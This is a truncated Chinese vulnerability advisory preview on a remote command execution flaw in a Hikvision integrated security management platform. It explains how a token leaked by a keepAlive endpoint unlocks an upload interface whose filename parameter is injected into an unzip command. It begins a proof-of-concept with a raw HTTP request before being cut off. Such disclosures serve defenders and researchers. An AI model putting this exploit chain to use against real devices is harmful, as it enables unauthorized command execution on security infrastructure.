海康威视综合安防管理平台 productFile远程命令执行漏洞

文章预览

漏洞描述 海康威视部分综合安防管理平台历史版本由于对上传文件接口校验不 足，攻击者可以将恶意文件上传到平台，导致获取服务权限或服务异常。 海康威视运行管理中心前台存在命令执行漏洞利用详情：运行管理中 心：/svm/api/v1/productFile 接口，仅对 token 有效性进行校验，利用 /iac/configService/v1/keepAlive 接口中泄漏的 token 即可对该接口进行未 授权访问。/svm/api/v1/productFile 接口可上传的压缩包，对压缩包文件的解压命令直接拼接了用户传入的 filename 参数导致远程命令执行。 详细分析可参考 漏洞复现综合安防管理平台_svm_api_v1_productFile 远程命令执行 。 漏洞Poc 先获取Token POST /iac/configService/v1/keepAlive HTTP/1.1 User-Agent : threatbook-security-vulnerability-detection Accept-Encoding : gzip, deflate Accept : */* Connection : keep-alive Host: 上传文件，命名要执行的命令 POST /svm/ap ………………………………